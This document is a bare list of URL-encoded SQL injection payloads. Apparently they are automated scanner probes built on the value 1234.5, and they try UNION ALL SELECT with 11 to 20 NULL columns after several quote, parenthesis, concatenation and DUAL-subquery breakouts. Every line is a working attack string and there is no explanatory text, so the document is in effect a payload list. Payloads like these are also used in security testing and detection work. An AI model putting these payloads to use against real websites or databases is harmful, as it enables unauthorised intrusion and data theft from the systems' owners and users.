1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22Qegx%22%20LIKE%20%22Qegx 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22Ftss%22%20LIKE%20%22Ftss 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22fKQR%22%20LIKE%20%22fKQR 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22PtBJ%22%20LIKE%20%22PtBJ 1234.5%29%20WHERE%207563%3D7563%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20WHERE%205158%3D5158%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20WHERE%208383%3D8383%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20WHERE%206855%3D6855%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20WHERE%208050%3D8050%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20WHERE%203394%3D3394%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20WHERE%209895%3D9895%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20WHERE%204537%3D4537%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20WHERE%206727%3D6727%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20WHERE%206740%3D6740%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20WHERE%207337%3D7337%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20WHERE%201844%3D1844%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20WHERE%203229%3D3229%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20WHERE%201743%3D1743%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20WHERE%204646%3D4646%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20WHERE%202753%3D2753%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20WHERE%205322%3D5322%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20WHERE%204112%3D4112%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20WHERE%201100%3D1100%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20WHERE%207747%3D7747%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20WHERE%204121%3D4121%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20WHERE%207109%3D7109%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20WHERE%207533%3D7533%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20WHERE%207672%3D7672%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20WHERE%206208%3D6208%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20WHERE%201195%3D1195%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20WHERE%207223%3D7223%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20WHERE%209557%3D9557%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20WHERE%205042%3D5042%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20WHERE%206890%3D6890%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20WHERE%207679%3D7679%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20WHERE%208777%3D8777%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20WHERE%202750%3D2750%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20WHERE%208235%3D8235%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20WHERE%204756%3D4756%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20WHERE%203002%3D3002%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20WHERE%204297%3D4297%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20WHERE%204914%3D4914%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20WHERE%204292%3D4292%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20WHERE%209896%3D9896%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20%7C%7C%20%28SELECT%202702%20FROM%20DUAL%20WHERE%207454%3D7454%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%203686%20FROM%20DUAL%20WHERE%206918%3D6918%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%209462%20FROM%20DUAL%20WHERE%209715%3D9715%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%204978%20FROM%20DUAL%20WHERE%206057%3D6057%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%208507%20FROM%20DUAL%20WHERE%208497%3D8497%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%209646%20FROM%20DUAL%20WHERE%201844%3D1844%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%203888%20FROM%20DUAL%20WHERE%207782%3D7782%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%204243%20FROM%20DUAL%20WHERE%204827%3D4827%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%206093%20FROM%20DUAL%20WHERE%207200%3D7200%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%202852%20FROM%20DUAL%20WHERE%203975%3D3975%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%205487%20WHERE%205678%3D5678%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%205234%20WHERE%202222%3D2222%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%201049%20WHERE%206114%3D6114%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%202880%20WHERE%203240%3D3240%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%203897%20WHERE%206015%3D6015%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%208085%20WHERE%208646%3D8646%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%209537%20WHERE%207644%3D7644%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%207544%20WHERE%203749%3D3749%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%208607%20WHERE%209975%3D9975%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%204308%20WHERE%208742%3D8742%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%208682%20FROM%20DUAL%20WHERE%207949%3D7949%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%208622%20FROM%20DUAL%20WHERE%202263%3D2263%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%208805%20FROM%20DUAL%20WHERE%207250%3D7250%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%205667%20FROM%20DUAL%20WHERE%202808%3D2808%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%207242%20FROM%20DUAL%20WHERE%208271%3D8271%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%202297%20FROM%20DUAL%20WHERE%202095%3D2095%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%203916%20FROM%20DUAL%20WHERE%202795%3D2795%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%204490%20FROM%20DUAL%20WHERE%201274%3D1274%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%203115%20FROM%20DUAL%20WHERE%207251%3D7251%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%203894%20FROM%20DUAL%20WHERE%201076%3D1076%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%207774%20WHERE%203746%3D3746%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%207404%20WHERE%204780%3D4780%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%208591%20WHERE%201808%3D1808%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%203390%20WHERE%203849%3D3849%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%203559%20WHERE%208071%3D8071%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%202881%20WHERE%209495%3D9495%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%206254%20WHERE%202516%3D2516%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%204175%20WHERE%202681%3D2681%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%203739%20WHERE%205551%3D5551%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%203294%20WHERE%207440%3D7440%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 